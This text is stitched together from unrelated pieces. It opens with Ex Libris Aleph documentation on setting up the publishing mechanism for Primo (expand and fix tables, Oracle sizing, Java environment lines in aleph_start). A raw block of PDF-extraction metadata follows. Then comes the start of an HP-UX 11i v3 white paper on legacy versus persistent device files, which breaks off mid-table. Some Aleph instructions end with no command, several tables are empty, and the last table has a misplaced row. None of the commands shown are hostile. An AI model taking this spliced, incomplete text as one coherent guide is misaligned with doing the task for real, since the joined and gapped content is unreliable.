This expand program deletes all the fields in the record except the fields specified in Col.3 of tab_expand. The fields in Col.3 are separated by a comma.
Example:
<table>
<thead>
<tr>
<th>!</th>
<th>1</th>
<th>2</th>
<th>3</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!></td>
<td></td>
<td></td>
</tr>
<tr>
<td>TEST</td>
<td>expand_doc_del_fields</td>
<td>245##,260##,500##,AVA##</td>
<td></td>
</tr>
</tbody>
</table>
Only 245##, 260##, 500## and AVA## fields are retained.
### 2.4 expand_doc_bib_accref_1
This expand program works like expand_doc_bib_accref. The difference is that the cross reference information expanded by expand_doc_bib_accref_1 is put into lines named after the acc code of the relevant Z01 record of the bibliographic library.
If, for example, the acc code of the relevant Z01 record is AUT, then the line to which the information is expanded is called AUT.
### 3 Notes on Implementing the Publishing Mechanism for Primo
#### 3.1 General
For Primo, the publishing mechanism should be setup in the Bibliographic library.
In terms of expands, you should include the new expands for availability (expand_doc_bib_avail, expand_doc_bib_avail_hol) and cross-references.
Do not use expand_doc_bib_accref because Primo needs to be able to distinguish between preferred and non-preferred terms. In addition, if you need fields from the holdings records, e.g. 856 fields, include an expand that adds the HOL record to the BIB. (However, the LDR and 008 fields of the HOL must be removed. See below an explanation how to do this).
If you plan to implement both a regular pipe and an availability pipe you should use the following hardcoded sets:
- **PRIMO-FULL** – Should include the bibliographic record and all related expanded data (authority, holdings and availability)
- **PRIMO-AVAIL** – Should include only availability information
Note that the disk space you require is 12KB per record for the PRIMO-FULL set and 9KB per record for the PRIMO-AVAIL set.
**Tab_publish**
Here is an example for the tab_publish setup:
<table>
<thead>
<tr>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
</tr>
</thead>
<tbody>
<tr>
<td>!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!-!!!!!-!!!!!!!!!!!!!!</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>PRIMO-FULL</td>
<td>PRM01_PAC</td>
<td>N</td>
<td>PRM1</td>
<td>MARC_XML</td>
</tr>
<tr>
<td>PRIMO-AVAIL</td>
<td>PRM01_PAC</td>
<td>N</td>
<td>PRM2</td>
<td>MARC_XML</td>
</tr>
</tbody>
</table>
**Expands**
The following expands should be added to tab_expand for PRIMO-FULL
- expand_doc_bib_avail
- expand_doc_bib_accref_1
- expand_doc_bib_hol
In addition, if you need the HOL record, use an expand like expand_doc_bib_hol
The complete HOL is added, but the control fields should be removed. (007 is retained as it can contain useful information and has the same format as that of the BIB). This can be done by using Column 3 in the tab_expand table as shown in the example below.
The following expands should be added for PRIMO-AVAIL
- expand_doc_bib_avail
- expand_doc_del_fields – To delete all fields except for the availability field.
Example:
<table>
<thead>
<tr>
<th>tab_expand:</th>
</tr>
</thead>
<tbody>
<tr>
<td>PRM1</td>
</tr>
<tr>
<td>PRM1</td>
</tr>
<tr>
<td>PRM1</td>
</tr>
<tr>
<td>---</td>
</tr>
</tbody>
</table>
ExLibris Aleph
Tab_fix
The following setup is recommended to prevent the updating of Z00P due to a change in the 005 field (which is updated whenever the BIB record is saved in the cataloging client):
```
! 1 2 3
!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>
PRM1 fix_doc_do_file_08 del_005
```
The parameter file (del_005) should be located in the library’s import directory under the tab directory.
```
! 2 3 4 5 6 7 8 9
!!!!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!-!!!>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!
1 005 DELETE-FIELD
```
3.2 Setup for MAB Records Extract
The following is a setup example for publishing a MAB library.
3.2.1 $data_tab/tab_publish
```
! 1 2 3 4 5
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!-
PRIMO-FULL PRIMO MAB XML
PRIMO-ONGOING PRIMO MAB XML
```
3.2.2 $data_tab/tab_expand
```
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>
PRIMO expand_doc_sysno
PRIMO expand_doc_mab_recursive EXPAND-SON=PM-FAMILY,EXPAND-FATHER=PM-FAMILY,FIXDOC-SON=,FIXDOC-FATHER=
PRIMO expand_doc_bib_avail
PM-FAMILY expand_doc_mab_aut_ref 100##,4,196##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=100##,CROSS=101##,CROSS-DOC=101,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 800##,6,824##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=800##,CROSS=801##,CROSS-DOC=801,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 200##,4,296##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=200##,CROSS=201##,CROSS-DOC=201,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 802##,6,826##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=802##,CROSS=803##,CROSS-DOC=803,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 700##, , ,I-SF=aa,I-CODE=NNS,FIX-AUT=PMREF,PREF=700##,CROSS=701##,CROSS-DOC=701,TAG-MAX=99999
PM-FAMILY expand_doc_mab_aut_ref 902##,5,947##,I-SF=9a,I-CODE=IDN,FIX-AUT=PMREF,PREF=902##,CROSS=952##,CROSS-DOC=952,TAG-MAX=99999
```
Expand_doc_mab_recursive is called up from $data_tab/tab_expand (BIB library) by using the expand menu “PRIMO”. The new expand can be configured in the following way (tab_expand, col. 3), each entry has to be separated by a comma:
EXPAND-SON= Expand menu which should be used for expanding information from the current record (=son)
EXPAND-FATHER= Expand menu which should be used for expanding information from the father record into the son
FIXDOC-SON= Fix routine which should be used for the current record (=son)
FIXDOC-FATHER= Fix routine which should be used for the father record
Expand_doc_mab_aut_ref takes preferred term and cross-references for authorities from the authority record into the BIB record. This includes classifications (700) and subjects (9xx). Expand_doc_mab_aut_ref can be configured in the following way (tab_expand, col. 3). Each entry is separated by comma:
First source field BIB record which contains preferred term,
Increment value (optional),
Last source field BIB record which contains preferred term (optional),
I-SF = <Subfield BIB record which should be used to identify the corresponding AUT record><Subfield AUT record which contain the preferred term>,
I-CODE= Direct index which should be used to identify the AUT record,
FIX-AUT= Name of the fix routine which is used to transform the relevant fields within the AUT records into a format that is similar to the BIB fields (tab_fix, col.1, special description see below)
PREF= Field in the AUT record which contains the preferred term after the fix procedure called by FIX-AUT
CROSS= Field in the AUT record which contains the cross references after the fix procedure called by FIX-AUT
CROSS-DOC= Destination field in the BIB record for cross references
TAG-MAX= Max. no. of preferred terms and cross references per authority record to take over into the BIB record.
The fix routines that are called from “expand_doc_mab_aut_ref” (FIX-AUT=) have to be defined in ALEPH table $data_tab/tab_fix (AUT library). The fix routine is needed to transform the relevant fields (preferred term and cross references) within the AUT record into a format that is similar to the BIB fields. This is described below.
Col. 3 contains program arguments; in this case “tab_fix_convit_ref_pm” is a configuration file which contains the definitions about the source fields and destination fields (see below).
3.2.3 $data_tab/tab_fix and corresponding tab_fix_convit_ref_pm
PMREF fix_doc_convit
FILE=tab_fix_convit_ref_pm
The table "tab_fix_convit_ref_pm" must be added to authority files. The table tab_fix_convit_ref_pm must exist in each authority library, in the tab directory.
The following entries should be taken by default:
//lib10/tab/tab_fix_convit_ref_pm
<table>
<thead>
<tr>
<th>!</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>800</td>
<td>a</td>
<td>100</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>800a</td>
<td>a</td>
<td>100</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>800b</td>
<td>a</td>
<td>101</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>800c</td>
<td>a</td>
<td>101</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>820#</td>
<td>a</td>
<td>101</td>
<td>a</td>
<td>edit_field</td>
</tr>
<tr>
<td></td>
<td>830_</td>
<td>a</td>
<td>101</td>
<td>a</td>
<td></td>
</tr>
</tbody>
</table>
//lib11/tab/tab_fix_convit_ref_pm
<table>
<thead>
<tr>
<th>!</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>800_</td>
<td>a</td>
<td>200</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>801b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>803_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>810_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td>edit_field</td>
</tr>
<tr>
<td></td>
<td>811b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>812_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>813b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>814_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>815b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>816_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>817b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>818_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>819b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>820_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>821b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>822_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>823b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>824_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>825b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>826_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>827b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>828_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>829b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>830_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>831b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>832_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>833b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>834_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>835b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>836_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>837b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>838_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>839b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>840_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>841b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>842_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>843b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>844_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>845b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>846_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>847b</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>848_</td>
<td>a</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
<tr>
<td></td>
<td>849b</td>
<td>s</td>
<td>201</td>
<td>a</td>
<td></td>
</tr>
</tbody>
</table>
4 Technical Information for the ALEPH Publishing Mechanism
4.1 Information Required for the Maintenance of the Z00P Oracle Table
4.1.1 Disk Space, Definitions, and Basic Concepts
Entity – A representation of an ALEPH record in the Publishing platform in a certain format and in a certain type of content. Entities are stored in Oracle as a part of the ALEPH database.
Basic Entity – An entity that is in XML format containing data from the basic bibliographic record (with no expands).
Disk Space required:
<table>
<thead>
<tr>
<th></th>
<th>Basic Entity</th>
<th>Primo Entity - Full</th>
<th>Primo Entity - Avail</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Oracle Repository</strong></td>
<td>12K per entity</td>
<td>16K per entity</td>
<td>2K per entity</td>
</tr>
<tr>
<td><strong>Oracle Repository + Tar</strong></td>
<td>13K per entity</td>
<td>17K per entity</td>
<td>3K per entity</td>
</tr>
</tbody>
</table>
4.1.2 Oracle Recommendations
- When running Initial Publishing Process (publish-04) there are two possibilities:
Turn off Oracle Archiving before starting to run the job. After the job is finished, Oracle Archiving should be turned on and the database should be fully backed up (hot or cold backup). The implications of choosing this possibility are that data integrity is not kept during the time Oracle Archiving is off. If the data needs to be recovered, it can only be brought back to the point of time before the job has started. The benefits of using this mode is better performance and less disk space.
Keep Oracle archiving on. The disk space allocated for Z00P should be doubled from the sizes given above. This means the space available for the archive files should be doubled, not the Oracle tablespace. The implication of choosing this possibility is a slower throughput in the process (less entities/sec). The benefit is keeping data integrity at all times.
- It is recommended that the publishing entity (Z00P) Oracle table have a separate tablespace to help with maintenance
- To increase the throughput, the following setup should be applied:
- Enlarge the redo file from 50MB to 500MB. This should be done by an Oracle DBA.
- It is recommended that the redo files be on a different physical disk than the tablespace.
- If possible, the new tablespace should be on a different physical disk than the already existing ALEPH tablespace.
### 4.2 Initial Publishing Process (publish-04) Parallelism Recommendations
The Initial Publishing Process (publish-04) is a one time process. Therefore, it is recommended to run this process when the library's activity is minimal, such as during weekends and holidays. In order to maximize the throughput of the process and minimize the run time, it is recommended to use a large number of parallel processes. As a rule of thumb, it is recommended to use 70%-80% of the logical CPUs of the ALEPH server.
For setting a better fine-tuned configuration, it is recommended to monitor the utilization of the server and decide accordingly.
### 4.3 Implementation Notes
#### 4.3.1 Z00P/Z07P Creation
- If the `file_list` templates under `./aleph/tab/` are not being used, add the following lines to the `file_list` under the BIB/AUT libraries as in the following sample from the demo libraries.
Note that the Z07P table should be created in the same tablespace as existing ALEPH tables, and the Z07P indexes should be created in the same tablespace as existing ALEPH indexes.
In the BIB/AUT libraries, create the Z07P table using `Util A / 17 / 1`
The publishing library is by default the `usr_library`. However, it is possible to use a different publishing library by setting the `publishing_library` environment variable in the `aleph_start` file.
If the `file_list` templates under `./aleph/tab/` are not being used, or if using a library other than the `usr_library` is required for storing the published documents, add the following lines to the `file_list` under the `usr_library` (or the library that has been set as the `publishing_library`), as in the following sample from the demo libraries.
Note that the sizes given are for demonstration purposes only. For actual sizes, see Section 4.1.1 Disk Space, Definitions, and Basic Concepts.
In the `usr_library` (or the library that has been set as the `publishing_library`), create the Z00P table using `Util / A / 17 / 1`
4.3.2 Configuration Table
- Create the table `tab_publish` under `$data_tab` of the BIB/AUT library
- Use `Util / H / 2` (under the relevant BIB/AUT library) to synchronize the header of `./aleph/headers/libnn/tab/tab_publish`
4.3.3 JAVA Environment Configuration
- Add the following lines to `./alephe/aleph_start`
- Before the line:
```
switch ($platform_type)
```
add line:
```bash
setenv JAVA_MACHINE `uname -p`
```
- For Linux machines – in $platform_type switch, at the end of case 5, after the line:
```bash
setenv JAVA_HOME
```
add line:
```bash
setenv JAVA_MACHINE i386
```
- Add the lines:
```bash
setenv JAVA_ENABLED TRUE
setenv LD_LIBRARY_PATH
"${LD_LIBRARY_PATH}:${JAVA_HOME}/jre/lib/$JAVA_MACHINE"
setenv LD_LIBRARY_PATH
"${LD_LIBRARY_PATH}:${JAVA_HOME}/jre/lib/$JAVA_MACHINE/server"
```
- AIX users -
- Make sure that Java 1.4.2 or higher is installed. On AIX machines, Java is under $ORACLE_HOME/jdk. To install the required Java version, refer to the Aleph Installation Guide.
- In your $alephe_root/aleph_start file:
1. In the definition of the environment variable LIBPATH (under the "case AIX:" section), make sure that "$JAVA_HOME/jre/bin/classic" and "$JAVA_HOME/jre/bin" are BEFORE the system library "/usr/lib". For example:
```bash
setenv LIBPATH
"${aleph_product}/lib:${aleph_product}/local/libxml/lib:${JAVA_HOME}/jre/bin/classic:${JAVA_HOME}/jre/bin:/usr/lib:${LD_LIBRARY_PATH}"
```
2. Add the following line immediately after the definition of LIBPATH (under the "case AIX:" section), and before the "breaksw" statement:
```bash
setenv LDR_CNTRL USERREGS
```
- Shutdown Aleph and restart it using:
```bash
aleph_shutdown
aleph_startup
```
4.3.4 Daemon Handling
- Restart ue_01 daemon under relevant BIB/AUT libraries.
- In order to activate the new daemon for the ongoing update of the publishing platform, under relevant BIB/AUT libraries, use:
In order to stop the new daemon use:
4.3.5 Availability Updates
In order to publish records linked through an ITM link when item availability is changed (loan, return, etc.) in adm_library (for example, USM50), add to [adm_library]/tab/tab_z105 the following line:
```
UPDATE-ITM m USM50
```
Restart ue_11 in $z105_library
4.3.6 Additional Notes
- For ALEPH v. 21.1.3 and later:
It is possible to split the tar file created by the Create Tar File for ALEPH Published Records (publish-06) batch service into several files. This can be done by setting a "block size" in the $data_root/prof_library of the BIB library as follows:
```
setenv p_publish_06_block 5000
```
This definition sets a limit on the number of records in each output file. The default is 50000.
- For ALEPH v. 21.1.4 and later:
It is possible to keep the old log files created by the Create Tar File for Aleph Published Records (publish-06) batch service. This can be done by setting the "keep_log_files" parameter to Y in the $data_root/prof_library of the BIB library as follows:
```
setenv keep_log_files Y
```
- For ALEPH v. 22.1.0 and later:
It is possible to keep the empty directories created by the Create Tar File for Aleph Published Records (publish-06) batch service. This can be done by setting the "keep_publish_dir" parameter to Y in the $data_root/prof_library of the BIB library as follows:
```
setenv keep_publish_dir Y
```
- For ALEPH v. 16.02 on a Solaris machine, a GNU tar should be used. The following command should be used:
```
cp $alephm_proc/gnu_tar $aleph_product/bin/tar
source $alephe_root/aleph_start
```
- For v. 16.02 only:
1. Replace the old version of ./alephe/error_eng/p_publish_04 with the new one.
2. Add the files:
./alephe/error_eng/ue_21
./alephe/error_eng/p_publish_05
./alephe/error_eng/p_publish_06
./alephe/pc_b_eng/p-publish-04.xml
./alephe/pc_b_eng/p-publish-05.xml
./alephe/pc_b_eng/p-publish-06.xml
3. In the file ./alephe/pc_b_eng/menu-catalog.xml
• Remove the lines:
<item>
<display>Ongoing Publishing Process (publish-03)</display>
<file>p-publish-03</file>
</item>
• Add the lines:
<item>
<display>Delete ALEPH Published Records (publish-05)</display>
<file>p-publish-05</file>
</item>
<item>
<display>Create Tar File for ALEPH Published Records (publish-06)</display>
<file>p-publish-06</file>
</item>
• Add the files:
./alephe/error_eng/ue_21
./alephe/error_eng/p_publish_06
./alephe/pc_b_eng/p-publish-05.xml
./alephe/pc_b_eng/p-publish-06.xml
|
{"Source-Url": "https://files.mtstatic.com/site_11811/27674/2?Expires=1597962756&Signature=mnN9EMMEhltL2acjvkWRuAbOhzt4GabO4zaeeRwHt-hB5AWKZMm-oLq6fMEwENeu425arPHaFl5nTSu-h0C~KnNxX2VZXQXcxnluhDDYYpeDUFLrZVEkMRRC5rD-eJTcSbtSjm-xioUQtlk8t-vz3AqlODv0z9V-cYSoNFEulN0_&Key-Pair-Id=APKAJ5Y6AV4GI7A555NA", "len_cl100k_base": 12746, "olmocr-version": "0.1.53", "pdf-total-pages": 26, "total-fallback-pages": 0, "total-input-tokens": 64455, "total-output-tokens": 13154, "length": "2e13", "weborganizer": {"__label__adult": 0.00063323974609375, "__label__art_design": 0.00144195556640625, "__label__crime_law": 0.0018358230590820312, "__label__education_jobs": 0.013519287109375, "__label__entertainment": 0.00043272972106933594, "__label__fashion_beauty": 0.00021016597747802737, "__label__finance_business": 0.005733489990234375, "__label__food_dining": 0.0003786087036132813, "__label__games": 0.0016469955444335938, "__label__hardware": 0.0006132125854492188, "__label__health": 0.0004146099090576172, "__label__history": 0.0010519027709960938, "__label__home_hobbies": 0.00024509429931640625, "__label__industrial": 0.0005311965942382812, "__label__literature": 0.0038604736328125, "__label__politics": 0.0008845329284667969, "__label__religion": 0.0006232261657714844, "__label__science_tech": 0.03399658203125, "__label__social_life": 0.0003914833068847656, "__label__software": 0.220703125, "__label__software_dev": 0.7099609375, "__label__sports_fitness": 0.00025010108947753906, "__label__transportation": 0.00045990943908691406, "__label__travel": 0.0004122257232666016}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45637, 0.04757]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45637, 0.24023]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45637, 0.8045]], "google_gemma-3-12b-it_contains_pii": [[0, 49, false], [49, 3067, null], [3067, 5686, null], [5686, 5961, null], [5961, 7573, null], [7573, 8945, null], [8945, 10505, null], [10505, 13462, null], [13462, 14536, null], [14536, 16902, null], [16902, 18508, null], [18508, 20739, null], [20739, 22716, null], [22716, 25790, null], [25790, 28355, null], [28355, 30291, null], [30291, 31066, null], [31066, 32423, null], [32423, 35085, null], [35085, 36748, null], [36748, 37736, null], [37736, 40161, null], [40161, 41453, null], [41453, 43028, null], [43028, 44688, null], [44688, 45637, null]], "google_gemma-3-12b-it_is_public_document": [[0, 49, true], [49, 3067, null], [3067, 5686, null], [5686, 5961, null], [5961, 7573, null], [7573, 8945, null], [8945, 10505, null], [10505, 13462, null], [13462, 14536, null], [14536, 16902, null], [16902, 18508, null], [18508, 20739, null], [20739, 22716, null], [22716, 25790, null], [25790, 28355, null], [28355, 30291, null], [30291, 31066, null], [31066, 32423, null], [32423, 35085, null], [35085, 36748, null], [36748, 37736, null], [37736, 40161, null], [40161, 41453, null], [41453, 43028, null], [43028, 44688, null], [44688, 45637, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45637, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45637, null]], "pdf_page_numbers": [[0, 49, 1], [49, 3067, 2], [3067, 5686, 3], [5686, 5961, 4], [5961, 7573, 5], [7573, 8945, 6], [8945, 10505, 7], [10505, 13462, 8], [13462, 14536, 9], [14536, 16902, 10], [16902, 18508, 11], [18508, 20739, 12], [20739, 22716, 13], [22716, 25790, 14], [25790, 28355, 15], [28355, 30291, 16], [30291, 31066, 17], [31066, 32423, 18], [32423, 35085, 19], [35085, 36748, 20], [36748, 37736, 21], [37736, 40161, 22], [40161, 41453, 23], [41453, 43028, 24], [43028, 44688, 25], [44688, 45637, 26]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45637, 0.15356]]}
|
olmocr_science_pdfs
|
2024-12-11
|
2024-12-11
|
07786bd4f2426856ce9963479f0c7cfe61899eff
|
**Introduction**
In HP-UX 11i v3 HP has architected a new mass storage stack and subsystems to significantly enhance scalability, performance, availability, manageability, and serviceability. Maximum configuration limits have been increased to address very large SAN configurations while delivering performance with automatic load balancing, parallel I/O scan, optimized I/O forwarding, and CPU locality.
To enhance availability, the mass storage stack monitors paths to devices, reroutes traffic and recovers from path failures when they occur. The stack has a built-in intelligent retry algorithm on path failures and also implements path authentication to avoid data corruption. The introduction of native multi-pathing and path-independent persistent Device Special Files (DSFs) and the auto discovery of devices greatly enhance the overall manageability. New commands and libraries further enhance the manageability and serviceability of mass storage devices.
This re-architecture introduces a new representation of mass storage hardware and subsystems called the agile view. The central idea of the agile view is that disk and tape devices are identified via their World Wide Identifier (WWID) and not by a path to the device. Therefore in the agile representation, multiple paths to a single device can be transparently treated as a single virtualized path, with I/O distributed across many paths. A persistent DSF is not affected by changes in the paths to the device. To take full advantage of this agile view, HP recommends the migration to persistent DSFs.
This white paper provides a step by step guide to ease the process of migrating applications from using legacy DSFs to persistent DSFs. The key areas addressed in this white paper are:
- Comprehensive set of links in *Read before Migrating to HP-UX 11i v3* documents
- New commands and command line options to operate in the agile view
- Step by Step guide on what needs to be done prior to migration
- Detailed instructions on how to migrate
- Possible recovery actions in case backing out is needed
For a complete overview of the mass storage changes in HP-UX 11i v3, see *The Next Generation Mass Storage Stack* white paper at [http://www.hp.com/go/hpux-core-docs](http://www.hp.com/go/hpux-core-docs). Click on HP-UX 11i v3 and scroll down to the White papers section.
**Formats of DSFs and Hardware Paths for Mass Storage Devices**
**Legacy View**
The legacy DSF format for disks is:
```
/dev/[r]dsk/cxtydz[sn]
```
Where
- \( x \) is the HBA instance
- \( y \) is the SCSI-2 target number
- \( z \) is the SCSI-2 LUN number
- \( n \) is the partition number
**Example:** /dev/dsk/c5t0d1 or /dev/rdsk/c6t0d1s2
Note that the legacy DSF contains path related information. Associated with each legacy DSF is a specific legacy hardware path, and a multi-pathed device will have multiple legacy DSFs.
**Agile View**
The persistent DSF format for disks introduced with the agile view in HP-UX 11i v3 is:
/dev/[r]disk/diskx[_py]
Where \( x \) is the device instance
\( y \) is the partition number
Example: /dev/disk/disk2, /dev/rdisk/disk5_p2
The persistent DSF is associated with a LUN, not with a path to a LUN. A LUN has a virtualized hardware path known as the LUN hardware path. Each physical path to the LUN is a lunpath hardware path, which is the agile equivalent of the legacy hardware path. It is important to understand that there is no path related information encoded within a persistent DSF.
For more information on the agile naming model, see the HP-UX 11i v3 Mass Storage Device Naming white paper available at http://www.hp.com/go/hpux-core-docs. Click on HP-UX 11i v3 and scroll down to the White papers section.
Agile and Legacy Views in ioscan
By default in HP-UX 11i v3 ioscan shows the legacy view. This view is compatible with previous releases of HP-UX. To enable the agile view in output of the ioscan command you must use the new \(-N\) option.
Mapping Commands
In HP-UX 11i v3, the ioscan command offers two new options to map configuration information from the legacy view to agile view:
- \(-m\) dsf [dsf_name]
- To map legacy DSFs to persistent DSFs
- \(-m\) hwpath [-H hw_path]
- To map legacy hardware paths to lunpath hardware paths and LUN hardware paths
Legacy DSF to Persistent DSF mapping:
The ioscan \(-m\) dsf [dsf_name] command shows the mapping between character legacy DSFs and character persistent DSFs if no dsf_name is specified. As a rule, the block DSFs are mapped similarly. If a dsf_name is specified, it shows the mapping for this DSF name only.
Sample ioscan \(-m\) dsf output:
<table>
<thead>
<tr>
<th>Persistent DSF</th>
<th>Legacy DSF(s)</th>
</tr>
</thead>
<tbody>
<tr>
<td>/dev/rdisk/disk17</td>
<td>/dev/rdsk/c9t0d0</td>
</tr>
<tr>
<td>/dev/rdisk/disk24</td>
<td>/dev/rdsk/c4t0d0</td>
</tr>
<tr>
<td>/dev/rdisk/disk37</td>
<td>/dev/rdsk/c5t0d0</td>
</tr>
<tr>
<td>/dev/rdisk/disk38</td>
<td>/dev/rdsk/c5t1d0</td>
</tr>
<tr>
<td>/dev/rdisk/c8t0d0</td>
<td>/dev/rdsk/c8t1d0</td>
</tr>
</tbody>
</table>
